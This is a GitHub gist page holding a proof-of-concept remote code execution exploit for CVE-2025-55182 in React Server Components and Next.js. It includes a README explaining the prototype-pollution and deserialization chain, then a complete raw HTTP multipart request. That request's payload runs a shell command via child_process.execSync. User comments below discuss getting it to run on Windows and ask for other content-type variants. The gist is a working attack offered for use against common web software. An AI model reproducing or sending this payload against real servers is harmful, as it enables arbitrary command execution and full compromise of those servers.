Skip to content

Instantly share code, notes, and snippets.

@maple3142

maple3142/CVE-2025-55182.http

Last active January 5, 2026 05:03
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save maple3142/48bc9393f45e068cf8c90ab865c0f5f3 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save maple3142/48bc9393f45e068cf8c90ab865c0f5f3 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2025-55182 React Server Components RCE POC
Raw
README.md

POC for CVE-2025-55182 that works on Next.js 16.0.6

Core idea

Use the $@ deserialization to get a Chunk reference, and put Chunk.prototype.then as the then property of the root object. Then then would be invoked with root object as this/chunk when it is awaited/resolved.

By setting the status to RESOLVED_MODEL, now we can call initializeModelChunk with a fake chunk that is comlpetely in our control. This is particularly useful since itself and its related functions call many methods from the chunk._response object.

Exploit

The target is to trigger the Blob deserialization, which calls response._formData.get with payload from response._prefix and return the result directly. So all we need is to set response._formData.get to Function so the returned result would be a function with attacker controlled code, then put that to then again so it would be executed.

Raw
CVE-2025-55182.http
POST / HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 459
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('xcalc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
@lokkju
Copy link

lokkju commented Dec 10, 2025
edited
Loading

@Codinplus31

:N1765362450970.6902 0:{"a":"$@1","f":"","b":"development"} 1:D{"time":6.808100000023842} 1:E{"digest":"1681718686","name":"Error","message":"Command failed: id\n'id' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n","stack":[],"env":"Server","owner":null}

That sure looks like the 'id' command that your exploit code is running with execSync() isn't available to your process; try other commands? Perhaps it's not even running on a Linux host?

In fact, "'[command]' is not recognized as an internal or external command" is a classic indicator of a Windows environment.

@Codinplus31
Copy link

Codinplus31 commented Dec 10, 2025

I'm using windows. How can I get through the error ?

@Vitalik-Hakim
Copy link

Vitalik-Hakim commented Dec 10, 2025

Holyshittt!!

@Praiseike
Copy link

Praiseike commented Dec 12, 2025

@Codinplus31 you're seeing a windows batch env error and saying it doesn't work XD

@EvtDanya
Copy link

EvtDanya commented Dec 12, 2025

Hey!

Is there any poc with application/x-www-form-urlencoded not multipart/form-data content-type ??

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment